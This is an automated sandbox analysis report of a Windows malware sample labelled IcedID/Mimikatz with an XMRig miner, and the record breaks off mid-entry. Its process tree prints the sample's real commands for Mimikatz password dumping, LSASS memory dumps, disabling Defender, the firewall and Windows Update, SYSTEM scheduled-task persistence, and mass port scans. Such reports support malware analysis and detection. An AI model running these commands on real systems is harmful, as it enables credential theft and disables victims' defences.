Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-08-2024 01:01

General

  • Target

    2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe

  • Size

    8.6MB

  • MD5

    bb8927f0c1d50249d3502dfdef2503d2

  • SHA1

    c2f6d30ae0195140d336a18be185237ce658e135

  • SHA256

    89034a71deda279b1e49f76da222dab7023ff5c2f6c3b6737d84598821dee955

  • SHA512

    1acac6eb18b856c1108845580673071d423cc164391d67c715e377c96f863f1bd5c89d634d2328aacc73ae065ba08d08258c922e36e5db313229b5797d99ae5a

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (20034) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 35 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2052
      • C:\Windows\TEMP\ekleagute\pcgcfj.exe
        "C:\Windows\TEMP\ekleagute\pcgcfj.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
    • C:\Users\Admin\AppData\Local\Temp\2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4588
        • C:\Windows\bipepyze\sabzgqz.exe
          C:\Windows\bipepyze\sabzgqz.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1664
    • C:\Windows\bipepyze\sabzgqz.exe
      C:\Windows\bipepyze\sabzgqz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3936
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:4924
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:2784
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2744
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3892
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3544
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3240
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1996
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3644
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:216
            • C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe
              C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2388
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2112
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4660
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1744
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2016
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2828
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3472
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:1376
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                      PID:3924
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3848
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                    PID:336
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                        PID:752
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start npf
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2852
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4380
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:852
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2840
                    • C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe
                      C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:8
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    PID:3520
                    • C:\Windows\tsmmkppcn\Corporate\vfshost.exe
                      C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1192
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                    2⤵
                      PID:4336
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                          PID:4572
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3496
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4348
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4668
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:3876
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4400
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4924
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1008
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1500
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3484
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3472
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4388
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4228
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1532
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2188
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2388
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4368
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2168
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4120
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:732
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop SharedAccess
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4212
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3208
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4916
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                          PID:2124
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:456
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4500
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh Advfirewall set allprofiles state off
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2784
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop MpsSvc
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1500
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3484
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                                PID:4388
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop WinDefend
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1408
                            • C:\Windows\SysWOW64\net.exe
                              net stop WinDefend
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4384
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3352
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop wuauserv
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2712
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                                PID:3044
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  4⤵
                                    PID:2872
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config MpsSvc start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4976
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config MpsSvc start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:212
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config SharedAccess start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1964
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config SharedAccess start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2964
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config WinDefend start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2216
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WinDefend start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:2280
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config wuauserv start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2256
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2636
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:3056
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 772 C:\Windows\TEMP\tsmmkppcn\772.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1532
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1012 C:\Windows\TEMP\tsmmkppcn\1012.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2884
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2052 C:\Windows\TEMP\tsmmkppcn\2052.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4080
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2684 C:\Windows\TEMP\tsmmkppcn\2684.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3496
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2972 C:\Windows\TEMP\tsmmkppcn\2972.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4896
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2996 C:\Windows\TEMP\tsmmkppcn\2996.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4976
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 408 C:\Windows\TEMP\tsmmkppcn\408.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3892
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3776 C:\Windows\TEMP\tsmmkppcn\3776.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2484
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3868 C:\Windows\TEMP\tsmmkppcn\3868.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3416
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3928 C:\Windows\TEMP\tsmmkppcn\3928.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1744
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4020 C:\Windows\TEMP\tsmmkppcn\4020.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2880
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 804 C:\Windows\TEMP\tsmmkppcn\804.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3956
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4364 C:\Windows\TEMP\tsmmkppcn\4364.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4416
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3976 C:\Windows\TEMP\tsmmkppcn\3976.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4572
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3736 C:\Windows\TEMP\tsmmkppcn\3736.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:984
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3648 C:\Windows\TEMP\tsmmkppcn\3648.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2516
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1564 C:\Windows\TEMP\tsmmkppcn\1564.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2484
                              • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2388 C:\Windows\TEMP\tsmmkppcn\2388.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1724
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:916
                                • C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exe
                                  pejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:956
                            • C:\Windows\SysWOW64\hmhriy.exe
                              C:\Windows\SysWOW64\hmhriy.exe
                              1⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:1188
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe
                              1⤵
                                PID:2288
                                • C:\Windows\ime\sabzgqz.exe
                                  C:\Windows\ime\sabzgqz.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4984
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F
                                1⤵
                                  PID:2740
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    2⤵
                                      PID:2184
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F
                                      2⤵
                                        PID:736
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F
                                      1⤵
                                        PID:4412
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:4716
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F
                                            2⤵
                                              PID:756
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe
                                            1⤵
                                              PID:5752
                                              • C:\Windows\ime\sabzgqz.exe
                                                C:\Windows\ime\sabzgqz.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5960
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F
                                              1⤵
                                                PID:6112
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  2⤵
                                                    PID:4428
                                                  • C:\Windows\system32\cacls.exe
                                                    cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F
                                                    2⤵
                                                      PID:5244
                                                  • C:\Windows\system32\cmd.EXE
